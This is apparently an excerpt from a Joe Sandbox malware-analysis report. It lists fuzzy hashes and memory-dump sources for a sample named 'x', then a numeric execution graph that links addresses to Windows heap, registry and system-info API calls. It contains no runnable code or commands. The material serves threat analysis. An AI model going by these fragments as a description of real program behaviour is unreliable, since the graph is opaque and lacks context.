                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d61117ed0113ba8fcdef25bd7c8c31e4b5e4c9e2196aacc2352e390a614ffe08
                                                  • Instruction ID: e364ea2b6fe815eff54845ca116d775641348056e726f8c0c89044629e962562
                                                  • Opcode Fuzzy Hash: d61117ed0113ba8fcdef25bd7c8c31e4b5e4c9e2196aacc2352e390a614ffe08
                                                  • Instruction Fuzzy Hash: 7F51E070E00258DFDB14CFA9D885B9EBBB1BF49304F20912AE815AB260DB75A845CF49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f05f7c63dfce593c6551d9e3618b33455ccda91ef597687ceb0f22f481f7af33
                                                  • Instruction ID: f40f9d81bcb62ddcbde1f05cf6288b32c2adccab692e2351e291f7a67800f123
                                                  • Opcode Fuzzy Hash: f05f7c63dfce593c6551d9e3618b33455ccda91ef597687ceb0f22f481f7af33
                                                  • Instruction Fuzzy Hash: F451E270D002589FDB14DFA9D985B9EBBB2BB49700F20912AD815AB360DB74A845CF89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dafa5208ebd27c5a1315be61daab2a6ce00025c6cd1b40429f8f581700cffe34
                                                  • Instruction ID: 08521dba77c29c18772dc44a8a759c36b1a2d16595960fc18b6d1d8364edf787
                                                  • Opcode Fuzzy Hash: dafa5208ebd27c5a1315be61daab2a6ce00025c6cd1b40429f8f581700cffe34
                                                  • Instruction Fuzzy Hash: C251EDB4D00258DFDB14DFA9C984BDEFBF1BB49300F20952AE815AB260DB74A885CF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_700000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a922537ccb16bffa96ab12c94908a378b60bf2deb6c374434e86988a629006c2
                                                  • Instruction ID: 865a0e0ca0b6714def58819de2d587c60056d587a46a73c68982d189ec02c6f3
                                                  • Opcode Fuzzy Hash: a922537ccb16bffa96ab12c94908a378b60bf2deb6c374434e86988a629006c2
                                                  • Instruction Fuzzy Hash: A9515DB1D056588BEB28CF6B9D446CAFAF3AFC9300F54C1FA944CA6255EB700AC58E11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_700000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc8fbaa54ee9b8bdab04a26f6c40de25ec7faa41104f1c698c71d4944c42728e
                                                  • Instruction ID: 2a807cb2df21e80a8ecb05fb41f66783f61a6cf5bb955c9be87933a4cd142f81
                                                  • Opcode Fuzzy Hash: fc8fbaa54ee9b8bdab04a26f6c40de25ec7faa41104f1c698c71d4944c42728e
                                                  • Instruction Fuzzy Hash: 0F41EEB4E00348DFDB20CFE9D984B9EBBF1AB49710F20912AE415AB291D7789885CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8935735bf94d600d6b5725e5ff92211ce56a8563f9eef88f65e4ec4b761e3278
                                                  • Instruction ID: 24057e3097b7730fa13bda4f112dc8c98f87b85abedf91384c74d6905e456919
                                                  • Opcode Fuzzy Hash: 8935735bf94d600d6b5725e5ff92211ce56a8563f9eef88f65e4ec4b761e3278
                                                  • Instruction Fuzzy Hash: 124143B1E016588BEB2CCF6B8D4078AFAF7AFC5200F14C1FAD54DAA265DB3119528F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:30.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:4.3%
                                                  Total number of Nodes:1844
                                                  Total number of Limit Nodes:69
                                                  execution_graph 9624 40c640 9651 404bee 9624->9651 9627 404bee 6 API calls 9628 40c66b 9627->9628 9630 404bee 6 API calls 9628->9630 9636 40c708 9628->9636 9629 402bab 2 API calls 9631 40c70f 9629->9631 9632 40c683 9630->9632 9633 40c701 9632->9633 9635 404bee 6 API calls 9632->9635 9634 402bab 2 API calls 9633->9634 9634->9636 9639 40c694 9635->9639 9636->9629 9637 40c6f8 9638 402bab 2 API calls 9637->9638 9638->9633 9639->9637 9658 40c522 9639->9658 9641 40c6a9 9642 40c6ef 9641->9642 9643 405872 4 API calls 9641->9643 9644 402bab 2 API calls 9642->9644 9645 40c6c5 9643->9645 9644->9637 9646 405872 4 API calls 9645->9646 9647 40c6d5 9646->9647 9648 405872 4 API calls 9647->9648 9649 40c6e7 9648->9649 9650 402bab 2 API calls 9649->9650 9650->9642 9652 402b7c 2 API calls 9651->9652 9654 404bff 9652->9654 9653 404c3b 9653->9627 9653->9631 9654->9653 9655 4031e5 4 API calls 9654->9655 9656 404c28 9655->9656 9656->9653 9657 402bab 2 API calls 9656->9657 9657->9653 9659 402b7c 2 API calls 9658->9659 9660 40c542 9659->9660 9660->9641 9661 405941 9662 4031e5 4 API calls 9661->9662 9663 405954 9662->9663 8311 409046 8324 413b28 8311->8324 8313 40906d 8315 405b6f 6 API calls 8313->8315 8314 40904e 8314->8313 8316 403fbf 7 API calls 8314->8316 8317 40907c 8315->8317 8316->8313 8318 409092 8317->8318 8328 409408 8317->8328 8320 4090a3 8318->8320 8323 402bab 2 API calls 8318->8323 8322 402bab 2 API calls 8322->8318 8323->8320 8325 413b31 8324->8325 8326 413b38 8324->8326 8327 404056 6 API calls 8325->8327 8326->8314 8327->8326 8329 409413 8328->8329 8330 40908c 8329->8330 8342 409d36 8329->8342 8330->8322 8341 40945c 8448 40a35d 8341->8448 8343 409d43 8342->8343 8344 40a35d 4 API calls 8343->8344 8345 409d55 8344->8345 8346 4031e5 4 API calls 8345->8346 8347 409d8b 8346->8347 8348 4031e5 4 API calls 8347->8348 8349 409dd0 8348->8349 8350 405b6f 6 API calls 8349->8350 8382 409423 8349->8382 8353 409df7 8350->8353 8351 409e1c 8352 4031e5 4 API calls 8351->8352 8351->8382 8354 409e62 8352->8354 8353->8351 8355 402bab 2 API calls 8353->8355 8356 4031e5 4 API calls 8354->8356 8355->8351 8357 409e82 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ea2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409ec2 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409ee2 8362->8363 8364 4031e5 4 API calls 8363->8364 8365 409f02 8364->8365 8366 4031e5 4 API calls 8365->8366 8367 409f22 8366->8367 8368 4031e5 4 API calls 8367->8368 8371 409f42 8368->8371 8369 40a19b 8370 408b2c 4 API calls 8369->8370 8370->8382 8371->8369 8372 409fa3 8371->8372 8373 405b6f 6 API calls 8372->8373 8372->8382 8375 409fbd 8373->8375 8374 40a02c 8376 4031e5 4 API calls 8374->8376 8403 40a16d 8374->8403 8375->8374 8377 402bab 2 API calls 8375->8377 8378 40a070 8376->8378 8380 409fd7 8377->8380 8383 4031e5 4 API calls 8378->8383 8379 402bab 2 API calls 8379->8382 8381 405b6f 6 API calls 8380->8381 8385 409fe5 8381->8385 8382->8341 8404 4056bf 8382->8404 8384 40a090 8383->8384 8387 4031e5 4 API calls 8384->8387 8385->8374 8386 402bab 2 API calls 8385->8386 8388 409fff 8386->8388 8389 40a0b0 8387->8389 8390 405b6f 6 API calls 8388->8390 8392 4031e5 4 API calls 8389->8392 8391 40a00d 8390->8391 8391->8374 8394 40a021 8391->8394 8393 40a0d0 8392->8393 8395 4031e5 4 API calls 8393->8395 8396 402bab 2 API calls 8394->8396 8397 40a0f0 8395->8397 8396->8382 8398 4031e5 4 API calls 8397->8398 8399 40a110 8398->8399 8400 40a134 8399->8400 8401 4031e5 4 API calls 8399->8401 8400->8403 8458 408b2c 8400->8458 8401->8400 8403->8379 8403->8382 8405 402b7c 2 API calls 8404->8405 8407 4056cd 8405->8407 8406 4056d4 8409 408c4d 8406->8409 8407->8406 8408 402b7c 2 API calls 8407->8408 8408->8406 8410 413ba4 6 API calls 8409->8410 8411 408c5c 8410->8411 8412 408f02 8411->8412 8413 408f3a 8411->8413 8416 40903e 8411->8416 8415 405b6f 6 API calls 8412->8415 8414 405b6f 6 API calls 8413->8414 8430 408f51 8414->8430 8417 408f0c 8415->8417 8432 413aca 8416->8432 8417->8416 8421 408f31 8417->8421 8461 40a1b6 8417->8461 8419 405b6f 6 API calls 8419->8430 8420 402bab 2 API calls 8420->8416 8421->8420 8423 409031 8424 402bab 2 API calls 8423->8424 8424->8421 8425 409022 8426 402bab 2 API calls 8425->8426 8427 409028 8426->8427 8428 402bab 2 API calls 8427->8428 8428->8421 8429 402bab GetProcessHeap RtlFreeHeap 8429->8430 8430->8416 8430->8419 8430->8421 8430->8423 8430->8425 8430->8429 8431 40a1b6 15 API calls 8430->8431 8495 4044ee 8430->8495 8431->8430 8433 413ad7 8432->8433 8441 409451 8432->8441 8434 405781 4 API calls 8433->8434 8435 413af0 8434->8435 8436 405781 4 API calls 8435->8436 8437 413afe 8436->8437 8438 405762 4 API calls 8437->8438 8439 413b0e 8438->8439 8440 405781 4 API calls 8439->8440 8439->8441 8440->8441 8442 405695 8441->8442 8443 4056a0 8442->8443 8447 4056b9 8442->8447 8444 402bab 2 API calls 8443->8444 8445 4056b3 8444->8445 8446 402bab 2 API calls 8445->8446 8446->8447 8447->8341 8449 40a39a 8448->8449 8450 40a368 8448->8450 8451 40a3af 8449->8451 8453 4031e5 4 API calls 8449->8453 8456 4031e5 4 API calls 8450->8456 8452 40a3ca 8451->8452 8454 408b2c 4 API calls 8451->8454 8455 40a38a 8452->8455 8457 408b2c 4 API calls 8452->8457 8453->8451 8454->8452 8455->8330 8456->8455 8457->8455 8459 4031e5 4 API calls 8458->8459 8460 408b3e 8459->8460 8460->8403 8462 40a202 8461->8462 8463 40a1c3 8461->8463 8617 405f08 8462->8617 8465 405b6f 6 API calls 8463->8465 8467 40a1d0 8465->8467 8466 40a1fc 8466->8421 8467->8466 8469 40a1f3 8467->8469 8505 40a45b 8467->8505 8470 402bab 2 API calls 8469->8470 8470->8466 8471 402bab 2 API calls 8471->8466 8473 405b6f 6 API calls 8475 40a245 8473->8475 8474 40a25d 8476 405b6f 6 API calls 8474->8476 8475->8474 8477 413a58 14 API calls 8475->8477 8482 40a26b 8476->8482 8478 40a257 8477->8478 8481 402bab 2 API calls 8478->8481 8479 40a28b 8480 405b6f 6 API calls 8479->8480 8487 40a297 8480->8487 8481->8474 8482->8479 8484 40a284 8482->8484 8624 40955b 8482->8624 8483 40a2b7 8488 405b6f 6 API calls 8483->8488 8492 40a333 8483->8492 8494 402bab 2 API calls 8483->8494 8641 4098a7 8483->8641 8486 402bab 2 API calls 8484->8486 8486->8479 8487->8483 8489 40a2b0 8487->8489 8631 40968e 8487->8631 8488->8483 8491 402bab 2 API calls 8489->8491 8491->8483 8492->8471 8494->8483 8496 402b7c 2 API calls 8495->8496 8497 404512 8496->8497 8499 404585 GetLastError 8497->8499 8500 402bab 2 API calls 8497->8500 8503 402b7c 2 API calls 8497->8503 8504 40457c 8497->8504 8896 4044a7 8497->8896 8501 404592 8499->8501 8499->8504 8500->8497 8502 402bab 2 API calls 8501->8502 8502->8504 8503->8497 8504->8430 8650 40642c 8505->8650 8507 40a469 8508 40c4ff 8507->8508 8653 4047e6 8507->8653 8508->8469 8511 4040bb 13 API calls 8512 40bf88 8511->8512 8512->8508 8513 403c90 8 API calls 8512->8513 8514 40bfaa 8513->8514 8515 402b7c 2 API calls 8514->8515 8517 40bfc1 8515->8517 8516 40c4f3 8518 403f9e 5 API calls 8516->8518 8519 40c3aa 8517->8519 8660 40a423 8517->8660 8518->8508 8519->8516 8522 4056bf 2 API calls 8519->8522 8526 40c4e3 8519->8526 8520 402bab 2 API calls 8520->8516 8524 40c3d2 8522->8524 8524->8526 8528 4040bb 13 API calls 8524->8528 8525 405f08 4 API calls 8527 40c005 8525->8527 8526->8520 8530 40c021 8527->8530 8663 40a43f 8527->8663 8529 40c3f3 8528->8529 8532 40c4d1 8529->8532 8720 405a52 8529->8720 8531 4031e5 4 API calls 8530->8531 8534 40c034 8531->8534 8537 413aca 4 API calls 8532->8537 8543 4031e5 4 API calls 8534->8543 8540 40c4dd 8537->8540 8538 40c411 8725 405a87 8538->8725 8539 402bab 2 API calls 8539->8530 8542 405695 2 API calls 8540->8542 8542->8526 8549 40c04d 8543->8549 8544 40c4b3 8545 402bab 2 API calls 8544->8545 8547 40c4cb 8545->8547 8546 405a52 4 API calls 8557 40c423 8546->8557 8548 403f9e 5 API calls 8547->8548 8548->8532 8551 4031e5 4 API calls 8549->8551 8550 405a87 4 API calls 8550->8557 8552 40c085 8551->8552 8554 4031e5 4 API calls 8552->8554 8553 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8553->8557 8555 40c09c 8554->8555 8558 4031e5 4 API calls 8555->8558 8556 402bab 2 API calls 8556->8557 8557->8544 8557->8546 8557->8550 8557->8553 8557->8556 8559 40c0b3 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c0ca 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c0e7 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c100 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c119 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c132 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c14b 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c164 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c17d 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c196 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1af 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1c8 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c1de 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c1f4 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c20d 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c226 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c23f 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c258 8592->8593 8594 4031e5 4 API calls 8593->8594 8595 40c273 8594->8595 8596 4031e5 4 API calls 8595->8596 8597 40c28a 8596->8597 8598 4031e5 4 API calls 8597->8598 8601 40c2d5 8598->8601 8599 40c3a2 8600 402bab 2 API calls 8599->8600 8600->8519 8601->8599 8602 4031e5 4 API calls 8601->8602 8603 40c315 8602->8603 8604 40c38b 8603->8604 8666 404866 8603->8666 8605 403c40 5 API calls 8604->8605 8607 40c397 8605->8607 8609 403c40 5 API calls 8607->8609 8609->8599 8610 40c382 8612 403c40 5 API calls 8610->8612 8612->8604 8614 406c4c 6 API calls 8615 40c355 8614->8615 8615->8610 8690 4126a7 8615->8690 8618 4031e5 4 API calls 8617->8618 8619 405f1d 8618->8619 8620 405f55 8619->8620 8621 402b7c 2 API calls 8619->8621 8620->8466 8620->8473 8620->8474 8620->8492 8622 405f36 8621->8622 8622->8620 8623 4031e5 4 API calls 8622->8623 8623->8620 8625 409673 8624->8625 8630 40956d 8624->8630 8625->8484 8626 408b45 6 API calls 8626->8630 8627 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8627->8630 8628 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8628->8630 8629 402bab GetProcessHeap RtlFreeHeap 8629->8630 8630->8625 8630->8626 8630->8627 8630->8628 8630->8629 8632 4040bb 13 API calls 8631->8632 8636 4096a9 8632->8636 8633 40989f 8633->8489 8634 409896 8635 403f9e 5 API calls 8634->8635 8635->8633 8636->8633 8636->8634 8638 408b45 6 API calls 8636->8638 8639 402bab GetProcessHeap RtlFreeHeap 8636->8639 8640 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8636->8640 8889 4059d8 8636->8889 8638->8636 8639->8636 8640->8636 8642 4040bb 13 API calls 8641->8642 8649 4098c1 8642->8649 8643 4099fb 8643->8483 8644 4099f3 8645 403f9e 5 API calls 8644->8645 8645->8643 8646 402bab GetProcessHeap RtlFreeHeap 8646->8649 8647 4059d8 4 API calls 8647->8649 8648 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8648->8649 8649->8643 8649->8644 8649->8646 8649->8647 8649->8648 8651 4031e5 4 API calls 8650->8651 8652 406441 GetNativeSystemInfo 8651->8652 8652->8507 8654 4031e5 4 API calls 8653->8654 8657 40480a 8654->8657 8655 40485d 8655->8508 8655->8511 8656 4031e5 4 API calls 8656->8657 8657->8655 8657->8656 8658 40484f 8657->8658 8659 403c40 5 API calls 8658->8659 8659->8655 8661 4031e5 4 API calls 8660->8661 8662 40a435 8661->8662 8662->8525 8664 4031e5 4 API calls 8663->8664 8665 40a451 8664->8665 8665->8539 8667 4031e5 4 API calls 8666->8667 8668 40487c 8667->8668 8668->8610 8669 406c4c 8668->8669 8730 4068eb 8669->8730 8671 406e02 8671->8614 8672 406cab 8742 40469b 8672->8742 8673 406c6c 8673->8671 8673->8672 8739 406894 8673->8739 8680 406df1 8681 40469b 4 API calls 8680->8681 8681->8671 8682 406cef 8682->8680 8683 4031e5 4 API calls 8682->8683 8684 406d26 8683->8684 8684->8680 8685 40771e 6 API calls 8684->8685 8689 406d57 8685->8689 8686 406da2 8687 4031e5 4 API calls 8686->8687 8687->8680 8689->8686 8755 4068b0 8689->8755 8691 4126bb 8690->8691 8692 4126d1 8690->8692 8693 412840 8691->8693 8811 40488c 8691->8811 8692->8693 8817 407055 8692->8817 8693->8610 8697 412837 8699 403c40 5 API calls 8697->8699 8699->8693 8701 41281e 8702 4070ff 6 API calls 8701->8702 8702->8697 8703 407055 6 API calls 8704 412742 8703->8704 8704->8701 8705 40719a 6 API calls 8704->8705 8706 41276e 8705->8706 8707 412804 8706->8707 8833 406f4a 8706->8833 8861 4070ff 8707->8861 8710 41279a 8839 412553 8710->8839 8883 405907 8720->8883 8722 405a61 8723 405a76 8722->8723 8724 405907 4 API calls 8722->8724 8723->8538 8724->8722 8726 402b7c 2 API calls 8725->8726 8728 405a99 8726->8728 8729 405ade 8728->8729 8886 40595e 8728->8886 8729->8557 8758 4076a8 8730->8758 8732 406913 8733 406a61 8732->8733 8734 40771e 6 API calls 8732->8734 8733->8673 8735 406949 8734->8735 8735->8733 8736 40771e 6 API calls 8735->8736 8737 404678 4 API calls 8735->8737 8764 4046c2 8735->8764 8736->8735 8737->8735 8740 4031e5 4 API calls 8739->8740 8741 4068a6 8740->8741 8741->8673 8743 4046b4 8742->8743 8744 4046a4 8742->8744 8743->8671 8746 404678 8743->8746 8745 4031e5 4 API calls 8744->8745 8745->8743 8747 4031e5 4 API calls 8746->8747 8748 40468b 8747->8748 8748->8671 8749 40771e 8748->8749 8750 407737 8749->8750 8754 407748 8749->8754 8751 407644 6 API calls 8750->8751 8752 407741 8751->8752 8753 406baa 6 API calls 8752->8753 8753->8754 8754->8682 8756 4031e5 4 API calls 8755->8756 8757 4068c2 8756->8757 8757->8689 8759 4076c1 8758->8759 8763 4076d2 8758->8763 8772 407644 8759->8772 8763->8732 8765 4046d3 8764->8765 8766 4046d9 8764->8766 8807 40464c 8765->8807 8768 404678 4 API calls 8766->8768 8771 4046e9 8766->8771 8768->8771 8769 40469b 4 API calls 8770 404714 8769->8770 8770->8735 8771->8769 8771->8770 8773 407653 8772->8773 8775 407661 8772->8775 8773->8775 8780 406a6b 8773->8780 8776 406baa 8775->8776 8777 406bbb 8776->8777 8779 406bc8 8776->8779 8777->8779 8788 407402 8777->8788 8779->8763 8784 406a81 8780->8784 8781 402b7c 2 API calls 8781->8784 8782 406b8b 8782->8775 8783 406894 4 API calls 8783->8784 8784->8781 8784->8782 8784->8783 8785 406b96 8784->8785 8787 402bab 2 API calls 8784->8787 8786 402bab 2 API calls 8785->8786 8786->8782 8787->8784 8789 407644 6 API calls 8788->8789 8790 407412 8789->8790 8791 402b7c 2 API calls 8790->8791 8798 407450 8790->8798 8792 407483 8791->8792 8793 402b7c 2 API calls 8792->8793 8792->8798 8795 4074ce 8793->8795 8794 4074da 8796 4068cc 2 API calls 8794->8796 8795->8794 8797 402b7c 2 API calls 8795->8797 8796->8798 8801 40751f 8797->8801 8798->8779 8799 40752b 8800 4068cc 2 API calls 8799->8800 8800->8794 8801->8799 8803 4068cc 8801->8803 8804 4068d6 8803->8804 8805 4068e3 8803->8805 8804->8805 8806 402bab GetProcessHeap RtlFreeHeap 8804->8806 8805->8799 8806->8805 8808 404666 8807->8808 8809 404659 8807->8809 8808->8766 8810 4031e5 4 API calls 8809->8810 8810->8808 8812 4047e6 5 API calls 8811->8812 8813 404897 8812->8813 8814 40489c 8813->8814 8869 4047c7 8813->8869 8814->8692 8818 40706f 8817->8818 8819 407084 8817->8819 8818->8819 8820 407644 6 API calls 8818->8820 8824 4070e4 8819->8824 8872 406fd2 8819->8872 8821 40707d 8820->8821 8823 406baa 6 API calls 8821->8823 8823->8819 8824->8697 8825 40719a 8824->8825 8826 4071b0 8825->8826 8827 4071c5 8825->8827 8826->8827 8828 407644 6 API calls 8826->8828 8831 406fd2 4 API calls 8827->8831 8832 407226 8827->8832 8829 4071be 8828->8829 8830 406baa 6 API calls 8829->8830 8830->8827 8831->8832 8832->8701 8832->8703 8834 406f64 8833->8834 8836 406f75 8833->8836 8835 407644 6 API calls 8834->8835 8837 406f6e 8835->8837 8836->8710 8838 406baa 6 API calls 8837->8838 8838->8836 8880 4060ac 8839->8880 8862 407116 8861->8862 8863 40712b 8861->8863 8862->8863 8864 407644 6 API calls 8862->8864 8866 406fd2 4 API calls 8863->8866 8868 407187 8863->8868 8865 407124 8864->8865 8867 406baa 6 API calls 8865->8867 8866->8868 8867->8863 8868->8701 8870 4031e5 4 API calls 8869->8870 8871 4047d9 8870->8871 8871->8692 8873 406fde 8872->8873 8874 407027 8873->8874 8875 4031e5 4 API calls 8873->8875 8874->8824 8876 406ffa 8875->8876 8877 4031e5 4 API calls 8876->8877 8878 407011 8877->8878 8879 4031e5 4 API calls 8878->8879 8879->8874 8881 4031e5 4 API calls 8880->8881 8882 4060bb 8881->8882 8882->8882 8884 4031e5 4 API calls 8883->8884 8885 40591a 8884->8885 8885->8722 8887 4031e5 4 API calls 8886->8887 8888 405971 8887->8888 8888->8728 8890 4031e5 4 API calls 8889->8890 8891 4059ed 8890->8891 8892 405a38 8891->8892 8893 402b7c 2 API calls 8891->8893 8892->8636 8894 405a16 8893->8894 8894->8892 8895 4031e5 4 API calls 8894->8895 8895->8892 8897 4031e5 4 API calls 8896->8897 8898 4044b9 8897->8898 8898->8497 9735 40a349 9736 4098a7 14 API calls 9735->9736 9737 40a359 9736->9737 8974 408952 8995 40823f 8974->8995 8977 408960 8979 4056bf 2 API calls 8977->8979 8980 40896a 8979->8980 9023 408862 8980->9023 8982 413aca 4 API calls 8983 4089d4 8982->8983 8985 405695 2 API calls 8983->8985 8984 408975 8992 4089c4 8984->8992 9031 4087d6 8984->9031 8987 4089df 8985->8987 8992->8982 8993 402bab 2 API calls 8994 40899d 8993->8994 8994->8992 8994->8993 8996 40824d 8995->8996 8997 40831b 8996->8997 8998 4031e5 4 API calls 8996->8998 8997->8977 9011 4083bb 8997->9011 8999 40826d 8998->8999 9000 4031e5 4 API calls 8999->9000 9001 408289 9000->9001 9002 4031e5 4 API calls 9001->9002 9003 4082a5 9002->9003 9004 4031e5 4 API calls 9003->9004 9005 4082c1 9004->9005 9006 4031e5 4 API calls 9005->9006 9007 4082e2 9006->9007 9008 4031e5 4 API calls 9007->9008 9009 4082ff 9008->9009 9010 4031e5 4 API calls 9009->9010 9010->8997 9059 408363 9011->9059 9014 4056bf 2 API calls 9020 4083f4 9014->9020 9015 408492 9016 413aca 4 API calls 9015->9016 9017 4084a0 9016->9017 9018 405695 2 API calls 9017->9018 9019 4084ab 9018->9019 9019->8977 9020->9015 9062 40815d 9020->9062 9077 40805d 9020->9077 9092 404b8f 9023->9092 9025 408946 9025->8984 9026 4031e5 4 API calls 9028 40887e 9026->9028 9027 40893e 9095 404a39 9027->9095 9028->9025 9028->9026 9028->9027 9030 402b7c 2 API calls 9028->9030 9030->9028 9032 402b7c 2 API calls 9031->9032 9033 4087e7 9032->9033 9034 40885a 9033->9034 9035 4031e5 4 API calls 9033->9035 9043 408749 9034->9043 9038 408802 9035->9038 9036 408853 9037 402bab 2 API calls 9036->9037 9037->9034 9038->9036 9040 40884d 9038->9040 9104 408522 9038->9104 9108 4084b4 9038->9108 9111 4084d4 9040->9111 9044 404b8f 5 API calls 9043->9044 9046 408765 9044->9046 9045 4031e5 4 API calls 9045->9046 9046->9045 9047 4087c7 9046->9047 9048 408522 4 API calls 9046->9048 9050 4087cf 9046->9050 9049 404a39 5 API calls 9047->9049 9048->9046 9049->9050 9051 4085d1 9050->9051 9053 4086c2 9051->9053 9057 4085e9 9051->9057 9053->8994 9054 402bab 2 API calls 9054->9057 9055 4031e5 4 API calls 9055->9057 9057->9053 9057->9054 9057->9055 9117 4089e6 9057->9117 9136 4086c9 9057->9136 9140 4036a3 9057->9140 9060 4031e5 4 API calls 9059->9060 9061 408386 9060->9061 9061->9014 9061->9019 9063 40816f 9062->9063 9064 4081b6 9063->9064 9065 4081fd 9063->9065 9076 4081ef 9063->9076 9067 405872 4 API calls 9064->9067 9066 405872 4 API calls 9065->9066 9068 408213 9066->9068 9069 4081cf 9067->9069 9070 405872 4 API calls 9068->9070 9071 405872 4 API calls 9069->9071 9073 408222 9070->9073 9072 4081df 9071->9072 9074 405872 4 API calls 9072->9074 9075 405872 4 API calls 9073->9075 9074->9076 9075->9076 9076->9020 9078 40808c 9077->9078 9079 4080d2 9078->9079 9080 408119 9078->9080 9091 40810b 9078->9091 9082 405872 4 API calls 9079->9082 9081 405872 4 API calls 9080->9081 9083 40812f 9081->9083 9084 4080eb 9082->9084 9085 405872 4 API calls 9083->9085 9086 405872 4 API calls 9084->9086 9087 40813e 9085->9087 9088 4080fb 9086->9088 9090 405872 4 API calls 9087->9090 9089 405872 4 API calls 9088->9089 9089->9091 9090->9091 9091->9020 9098 404a19 9092->9098 9094 404ba0 9094->9028 9101 4049ff 9095->9101 9097 404a44 9097->9025 9099 4031e5 4 API calls 9098->9099 9100 404a2c RegOpenKeyW 9099->9100 9100->9094 9102 4031e5 4 API calls 9101->9102 9103 404a12 RegCloseKey 9102->9103 9103->9097 9106 408534 9104->9106 9105 4085af 9105->9038 9106->9105 9114 4084ee 9106->9114 9109 4031e5 4 API calls 9108->9109 9110 4084c7 9109->9110 9110->9038 9112 4031e5 4 API calls 9111->9112 9113 4084e7 9112->9113 9113->9036 9115 4031e5 4 API calls 9114->9115 9116 408501 9115->9116 9116->9105 9118 4031e5 4 API calls 9117->9118 9119 408a06 9118->9119 9120 408b21 9119->9120 9121 4031e5 4 API calls 9119->9121 9120->9057 9124 408a32 9121->9124 9122 408b17 9152 403649 9122->9152 9124->9122 9143 403666 9124->9143 9128 4031e5 4 API calls 9129 408a88 9128->9129 9130 4031e5 4 API calls 9129->9130 9135 408b0e 9129->9135 9131 408ac4 9130->9131 9132 405b6f 6 API calls 9131->9132 9133 408aff 9132->9133 9133->9135 9146 408508 9133->9146 9149 40362f 9135->9149 9137 4086e2 9136->9137 9138 408744 9136->9138 9137->9138 9139 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9137->9139 9138->9057 9139->9137 9141 4031e5 4 API calls 9140->9141 9142 4036b5 9141->9142 9142->9057 9144 4031e5 4 API calls 9143->9144 9145 403679 9144->9145 9145->9128 9145->9135 9147 4031e5 4 API calls 9146->9147 9148 40851b 9147->9148 9148->9135 9150 4031e5 4 API calls 9149->9150 9151 403642 9150->9151 9151->9122 9153 4031e5 4 API calls 9152->9153 9154 40365c 9153->9154 9154->9120 9755 40f252 9756 404bee 6 API calls 9755->9756 9757 40f269 9756->9757 9758 404bee 6 API calls 9757->9758 9769 40f2ff 9757->9769 9759 40f282 9758->9759 9760 404bee 6 API calls 9759->9760 9761 40f290 9760->9761 9772 404c4e 9761->9772 9763 40f2a7 9764 405872 4 API calls 9763->9764 9763->9769 9765 40f2cd 9764->9765 9766 405872 4 API calls 9765->9766 9767 40f2dc 9766->9767 9768 405872 4 API calls 9767->9768 9770 40f2ee 9768->9770 